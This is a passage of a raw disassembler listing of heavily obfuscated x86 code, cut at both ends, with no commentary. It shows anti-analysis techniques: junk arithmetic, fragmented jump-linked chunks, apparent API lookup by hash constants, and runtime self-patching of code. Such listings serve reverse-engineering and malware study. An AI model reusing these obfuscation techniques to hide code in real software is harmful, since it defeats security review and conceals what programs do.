		jmp	locret_4550A5
; ---------------------------------------------------------------------------
		mov	edx, 63180CAFh
		call	sub_440CD1
		call	sub_45405E
		mov	edx, 43A8AC5Ch
		call	sub_440CD1
		call	sub_45405E
		jmp	loc_43DBB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_43C6F9:				; CODE XREF: sub_4424B0:loc_458F5Aj
		pop	ebp
		push	79443FEAh
		pop	eax
		and	eax, 70A7446Dh
		add	eax, 0C6081927h
		and	eax, 69D0FA56h
		rol	eax, 15h
		add	eax, 0FF80FC7Dh
		jmp	loc_459B5A
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1D6

loc_43C720:				; CODE XREF: sub_43B1D6:loc_43C5CAj
		adc	eax, edi
		mov	ebp, esi
		jmp	loc_43BB02
; END OF FUNCTION CHUNK	FOR sub_43B1D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_43C729:				; CODE XREF: sub_44346B-6A43j
		sbb	edx, ebp
		ror	ebp, 0Dh
		push	440D8E86h
		jmp	loc_43EA00
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------

loc_43C738:				; CODE XREF: y2kk37jd:004439E9j
					; y2kk37jd:loc_443E71j
		push	esi
		push	24094BD8h
		pop	esi
		and	esi, 0E9612850h
		jmp	loc_44A05D
; ---------------------------------------------------------------------------
		mov	esi, [ebx]
		jmp	loc_44D6BE
; ---------------------------------------------------------------------------
		push	ebx
		push	0C3DA37E9h
		pop	ebx
		add	ebx, ds:4000F3h
		sub	ebx, 0A5E71980h
		call	sub_4534CC
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_43C769:				; CODE XREF: sub_44FB21+37A2j
		jmp	loc_44E1FA
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446120

loc_43C76E:				; CODE XREF: sub_446120:loc_43F11Aj
		call	sub_442C3E
		mov	ds:off_41E10C, eax
		lea	eax, sub_455958
		mov	byte ptr [eax],	0C3h
		jmp	sub_455958
; END OF FUNCTION CHUNK	FOR sub_446120
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_43C787:				; CODE XREF: sub_44A33C:loc_446A4Cj
		push	offset loc_4473DF
		jmp	nullsub_361
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------

loc_43C791:				; CODE XREF: y2kk37jd:00446713j
		push	esi
		push	0C0DC0DF9h
		pop	esi
		xor	esi, 8FDFA64Bh
		rol	esi, 1
		jmp	loc_4559E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_43C7A5:				; CODE XREF: sub_43CA5B:loc_43D096j
		ror	eax, 0Bh
		mov	ds:dword_44D2E8, eax
		retn
; ---------------------------------------------------------------------------

loc_43C7AF:				; CODE XREF: sub_43CA5B+A2C2j
		rol	eax, 0Bh
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455613

loc_43C7B4:				; CODE XREF: sub_455613-15EAj
		jmp	nullsub_167
; END OF FUNCTION CHUNK	FOR sub_455613

; =============== S U B	R O U T	I N E =======================================



sub_43C7B9	proc near		; CODE XREF: sub_450394p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043DF0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E5DB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440A24 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004470D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C160 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DD3B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044F415 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450ABB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004524EC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455845 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00457203 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457422 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A3CA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045BFAA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C133 SIZE 0000000E BYTES

		push	ebp
		jmp	loc_44F415
sub_43C7B9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C7BF	proc near		; CODE XREF: y2kk37jd:004467D3j
					; sub_43F8B8+15CE6p

; FUNCTION CHUNK AT 0045BB8F SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		popf
		xor	eax, edi
		pop	edi
		add	eax, 64CD342Fh
		jmp	loc_45BB8F
sub_43C7BF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C7D2:				; CODE XREF: y2kk37jd:loc_447D3Dj
		sub	eax, 0B4C3D01Dh
		add	eax, 795715BFh
		xchg	eax, [esp]
		jmp	loc_454F5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43C7E6:				; CODE XREF: sub_43EF4F:loc_44960Aj
		ror	eax, 14h
		jmp	loc_44B5C4
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D8B6

loc_43C7EE:				; CODE XREF: sub_43D8B6:loc_44A7E5j
		jnz	loc_450E8C
		jmp	loc_43B9DE
; END OF FUNCTION CHUNK	FOR sub_43D8B6
; ---------------------------------------------------------------------------

loc_43C7F9:				; CODE XREF: y2kk37jd:0043B625j
		add	esi, 0F7225EE1h
		xchg	esi, [esp]
		jmp	sub_446819
; ---------------------------------------------------------------------------

loc_43C807:				; DATA XREF: y2kk37jd:004465F6o
		push	4499E335h
		pop	eax
		xor	eax, 0CA8CD7B5h
		sub	eax, 0EFD777B8h
		xor	eax, 8ADDB862h
		add	eax, ebp
		jmp	loc_44088C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_43C826:				; CODE XREF: sub_44CF09-770j
		jz	loc_441FA1
		jmp	loc_454268
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C831:				; CODE XREF: sub_445226:loc_44D513j
		mov	[edx-18h], eax
		jmp	loc_455F1C
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45484D

loc_43C839:				; CODE XREF: sub_45484D:loc_45485Aj
		push	offset loc_450578
		jmp	loc_44C3C0
; END OF FUNCTION CHUNK	FOR sub_45484D
; ---------------------------------------------------------------------------
		ja	loc_44D69C
		rol	ebp, 0Fh
		jmp	sub_447659

; =============== S U B	R O U T	I N E =======================================



sub_43C851	proc near		; CODE XREF: y2kk37jd:loc_450FF2j
					; sub_4585C4+7D1p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B09F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043BC79 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043D0A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D67F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043D836 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D9AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EAD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EC6E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EEB0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044092A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00441988 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004428F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E44 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443522 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004436E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443CA0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444544 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004446D4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004449D4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00445740 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445C78 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445EB1 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044657D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004466D5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044685C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BEB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447402 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044784A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447AEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B2E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447CE6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448AF6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004494BF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00449C9D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044B07F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B126 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C1C8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C42A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CDA4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D0CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E72B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450AFC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045138E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451C5A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00451E05 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452323 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452CE3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00453AE0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453C61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454013 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004558E9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004560E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456BF2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457017 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457CCF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004582C8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004593B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004597DF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045AA31 SIZE 00000005 BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		pop	esi

loc_43C856:				; CODE XREF: y2kk37jd:0043B028j
		cmp	dword ptr [ebp-14h], 0
		jnz	loc_452CE3
		jmp	loc_44D0CB
sub_43C851	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C865	proc near		; CODE XREF: sub_44A33C+2E1Cp
					; y2kk37jd:0044E014j

; FUNCTION CHUNK AT 0043D7EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F094 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044680C SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00448192 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448D2D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00449EBC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044AC12 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BC5E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D882 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F856 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044F8D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F964 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045075C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045283F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045355E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045584C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456D58 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458287 SIZE 0000000D BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	eax, 88A5BABAh
		rol	eax, 5
		sub	eax, 50263694h
		push	ecx
		push	6AD9E866h
		pop	ecx
		jmp	loc_43D7EB
sub_43C865	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	ecx, 11h
		mov	ebp, esi
		jmp	sub_45C14C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_43C88E:				; CODE XREF: sub_43C46D:loc_457D05j
		mov	eax, 0BEB860A6h
		push	ebx
		push	38932128h
		pop	ebx
		and	ebx, 3503322Ch
		xor	ebx, 83FD1E44h
		cmp	ebx, 647D2FAFh
		jmp	loc_452B70
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43C8B1:				; CODE XREF: sub_43EF4F:loc_4487F8j
		add	eax, ecx
		pop	ecx
		ror	eax, 15h
		push	edx
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43C8B8:				; CODE XREF: sub_43F911:loc_43D18Bj
		push	1C16830Ah
		jmp	loc_454A28
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------

loc_43C8C2:				; CODE XREF: y2kk37jd:00446067j
		mov	[eax], esi
		add	ecx, edi

loc_43C8C6:				; CODE XREF: y2kk37jd:loc_455ECDj
		mov	eax, [ebp-18h]
		mov	eax, [eax+24h]
		call	sub_44145C
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_43C8D1:				; CODE XREF: sub_44E63A:loc_44E643j
		jmp	loc_440E6A
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_43C8D6:				; CODE XREF: sub_440EC8+7061j
		jmp	loc_445139
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_43C8DB:				; CODE XREF: sub_442DDC:loc_457084j
		sub	al, 99h
		push	0FBE28403h
		pop	edx
		sub	edx, 79AD573Ah
		or	edx, 0EB750901h

loc_43C8EF:				; CODE XREF: y2kk37jd:0044A61Ej
		rol	edx, 9
		xor	edx, 8AF85D92h
		add	edx, ebp
		jmp	loc_453D65
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A8B6

loc_43C8FF:				; CODE XREF: sub_44A8B6:loc_44375Bj
		rol	eax, 15h
		xor	eax, 2C1E839h
		push	offset loc_44019B
		jmp	loc_43CFCE
; END OF FUNCTION CHUNK	FOR sub_44A8B6
; ---------------------------------------------------------------------------

loc_43C912:				; CODE XREF: y2kk37jd:loc_4462EFj
		push	edx
		call	sub_44461D
		mov	eax, 22143682h
		call	sub_442C3E
		mov	ds:dword_41E168, eax
		lea	eax, nullsub_17
		jmp	loc_443AE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_43C933:				; CODE XREF: sub_44AFF6-BDAj
		jb	loc_43D820

loc_43C939:				; CODE XREF: sub_44AFF6:loc_4509F0j
		call	sub_447977
		mov	edx, 1AE260E8h
		call	sub_440CD1
		push	eax
		ror	eax, 0Ch
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; START	OF FUNCTION CHUNK FOR sub_44493F

loc_43C94C:				; CODE XREF: sub_44493F:loc_444956j
		mov	ds:dword_444AD0, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44493F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_43C953:				; CODE XREF: sub_43E07B+1A2j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_43C958:				; CODE XREF: sub_4507BF-9D6Cj
		ja	loc_459EF8
		jle	loc_444DDA
		jns	loc_45C129

loc_43C96A:				; CODE XREF: sub_4507BF:loc_454BB2j
		cmp	dword ptr [ebp-108h], 43776569h
		jnz	loc_447BCD
		jmp	loc_450814
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 8
		mov	ds:dword_447324, eax
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_237. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4598BE

loc_43C98A:				; CODE XREF: sub_4598BE+9j
		jmp	loc_452A66
; END OF FUNCTION CHUNK	FOR sub_4598BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43C98F:				; CODE XREF: sub_4411C3+10C37j
		jmp	loc_45AE90
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C79E

loc_43C994:				; CODE XREF: sub_44C79E+12j
		jmp	loc_4557E9
; END OF FUNCTION CHUNK	FOR sub_44C79E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_43C999:				; CODE XREF: sub_4435B9:loc_451475j
					; sub_43C335+15DE7j
		rol	eax, 8
		push	eax
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_43C9A3:				; CODE XREF: sub_445568-2B16j
		jmp	loc_445C05
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43C9A8:				; CODE XREF: sub_43ED19+1CD9Dj
		jnz	loc_44E086
		jmp	loc_44173D
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C9B3:				; CODE XREF: sub_445226:loc_44DDE4j
		pop	ebx
		and	ebx, 227A6D3Ch
		xor	ebx, 253ED879h
		or	ebx, 418BD101h
		test	ebx, 10000h
		jmp	loc_4598D1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43C9D1:				; CODE XREF: y2kk37jd:0045839Aj
		jl	loc_449EBC

loc_43C9D7:				; CODE XREF: y2kk37jd:loc_44764Ej
		call	sub_454C73
		push	edx
		mov	edx, ebp
		xchg	edx, [esp]
		jmp	loc_4495DE

; =============== S U B	R O U T	I N E =======================================



sub_43C9E7	proc near		; CODE XREF: y2kk37jd:00452DB9j
					; sub_445226+15DC8p

; FUNCTION CHUNK AT 004415C0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045A9FA SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	7BBC4BE4h
		pop	eax
		xor	eax, 0A6201B78h
		jmp	loc_45A9FA
sub_43C9E7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_43C9FC:				; CODE XREF: sub_4492F7+1ABEj
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_44FC88[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		call	sub_44D302

loc_43CA12:				; CODE XREF: y2kk37jd:00447DEDj
		jmp	loc_442FE4
; END OF FUNCTION CHUNK	FOR sub_4492F7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_284. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CA18:				; CODE XREF: y2kk37jd:0045B224j
		jmp	loc_4590B0
; ---------------------------------------------------------------------------

loc_43CA1D:				; CODE XREF: y2kk37jd:004461D7j
		jmp	loc_4584B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_43CA22:				; CODE XREF: sub_44346B:loc_43EDD8j
		jz	loc_43EA07
		jmp	loc_43C729
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F30

loc_43CA2D:				; CODE XREF: sub_441F30+193EDj
		push	0AF768402h
		xchg	esi, [esp+4+var_4]
		mov	ebx, esi
		pop	esi
		add	ebx, 236043A5h
		xor	ebx, 0B0BDC62Bh
		jmp	loc_4443A0
; END OF FUNCTION CHUNK	FOR sub_441F30

; =============== S U B	R O U T	I N E =======================================



sub_43CA49	proc near		; CODE XREF: y2kk37jd:0043FB8Aj
					; sub_457533:loc_44B135p

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		retn
sub_43CA49	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455302

loc_43CA51:				; CODE XREF: sub_455302+Dj
		jmp	nullsub_163
; END OF FUNCTION CHUNK	FOR sub_455302
; ---------------------------------------------------------------------------

loc_43CA56:				; CODE XREF: y2kk37jd:00452E21j
		jmp	loc_44A9D5

; =============== S U B	R O U T	I N E =======================================



sub_43CA5B	proc near		; CODE XREF: sub_44AD49-8B45p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C7A5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043D096 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F2C8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446D06 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00447E58 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004489D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A894 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004521B6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454D32 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045540E SIZE 00000005 BYTES

		push	edi
		jmp	loc_454D32
sub_43CA5B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_43CA61:				; CODE XREF: sub_442376:loc_44A3E2j
		xchg	edi, [esp+0]
		jmp	loc_441966
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_43CA69:				; CODE XREF: sub_4597AE:loc_44487Dj
					; y2kk37jd:00444894j
		xor	edx, 0C01976B2h
		add	edx, 0E265E2EDh
		or	edx, 94D12C88h
		add	edx, 604E7FA8h
		xchg	edx, [esp+8+var_8]
		jmp	loc_44D3DC
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFAE

loc_43CA89:				; CODE XREF: sub_43BFAE:loc_44ECA3j
					; sub_4595D8:loc_459F06j
		push	esi
		push	0B72BB920h
		pop	esi
		sub	esi, 36F8D6C0h
		test	esi, 40000h
		jmp	loc_44D162
; END OF FUNCTION CHUNK	FOR sub_43BFAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_43CAA1:				; CODE XREF: sub_43F2F2:loc_43B3C3j
		ror	ebx, 1Dh
		cdq

loc_43CAA5:				; CODE XREF: y2kk37jd:004405C6j
		jge	loc_454E9C
		jmp	loc_4402DA
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		and	ebx, ecx
		jmp	sub_43C0B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_280. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445FFF

loc_43CAB8:				; CODE XREF: sub_445FFF+354Fj
		jmp	nullsub_499
; END OF FUNCTION CHUNK	FOR sub_445FFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_43CABE:				; CODE XREF: sub_451634+2C5Cj
		jmp	loc_45A2D8
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------

loc_43CAC3:				; CODE XREF: y2kk37jd:0043D54Bj
		jmp	loc_43CCD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43CAC8:				; CODE XREF: sub_44AC89+83EAj
		jnz	loc_447ABD
		jmp	loc_43DC37
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446303

loc_43CAD3:				; CODE XREF: sub_446303:loc_4556EEj
					; sub_446303+F3FDj
		call	sub_4474C5

loc_43CAD8:				; CODE XREF: y2kk37jd:00452109j
		adc	ecx, edi
		push	48E91EADh

loc_43CADF:				; CODE XREF: sub_45922C:loc_4520FCj
		add	eax, 88E7191Dh
		add	eax, ebp
		jmp	loc_44329F
; END OF FUNCTION CHUNK	FOR sub_446303
; ---------------------------------------------------------------------------

loc_43CAEC:				; CODE XREF: y2kk37jd:00440897j
		jnp	loc_457989
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_43CAF2:				; CODE XREF: sub_44B814:loc_440877j
		add	edx, 2708EBE1h
		call	sub_43B0BF
; END OF FUNCTION CHUNK	FOR sub_44B814
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_43CAFD:				; CODE XREF: sub_4599BE-5B49j
		jmp	nullsub_290
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================



sub_43CB02	proc near		; CODE XREF: sub_43BFAE+D22Cp
					; y2kk37jd:0045813Dj

; FUNCTION CHUNK AT 0044C32D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7CC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451F45 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004592ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ACA6 SIZE 00000028 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	nullsub_19
		call	nullsub_3
		call	sub_44E5E5
		push	esi
		push	0CFB685h
		jmp	loc_44C32D
sub_43CB02	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_43CB20:				; CODE XREF: sub_43F2F2+15BBFj
		push	2C73EA33h
		sub	edx, esi
		jmp	loc_443C4D
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		jbe	loc_441A51
		jmp	sub_454942
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43CB37:				; CODE XREF: sub_43ED19+AF7Fj
		mov	edi, esi
		adc	esi, 0CABCC795h
		jmp	loc_44DE8E
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_43CB44	proc near		; CODE XREF: y2kk37jd:0044B7FCj
					; sub_456541+6p

; FUNCTION CHUNK AT 0043EA86 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	ebx
		mov	ebx, ebp
		jmp	loc_43EA86
sub_43CB44	endp

; ---------------------------------------------------------------------------

loc_43CB50:				; CODE XREF: y2kk37jd:loc_4525A4j
		add	edi, 0E4BA9B97h
		xor	edi, 4A7CDA1Fh
		add	edi, ebp
		add	edi, 0EF294CABh
		mov	[edi], eax
		pop	edi
		jmp	loc_442A9F

; =============== S U B	R O U T	I N E =======================================



sub_43CB6C	proc near		; CODE XREF: y2kk37jd:0045074Cj
					; sub_45380A+501Bp

; FUNCTION CHUNK AT 0043F900 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440AE8 SIZE 00000011 BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_43CB82
		jnz	loc_440AE8
		mov	eax, ebx
		jmp	loc_440AEA
sub_43CB6C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43CB82	proc near		; CODE XREF: sub_43CB6C+4p
					; sub_4480CB-648Bp ...

; FUNCTION CHUNK AT 00446150 SIZE 0000000A BYTES

		mov	eax, [ebx+ecx]
		jmp	loc_446150
sub_43CB82	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_43CB8A:				; CODE XREF: sub_447F91+1j
		mov	eax, [esp+0]
		call	sub_442A94

loc_43CB92:				; CODE XREF: sub_44201B+17CB3j
		shl	edx, 14h
		or	edx, 66B56954h
		jmp	loc_44F2EC
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_43CBA0:				; CODE XREF: sub_44B0D0:loc_45BE99j
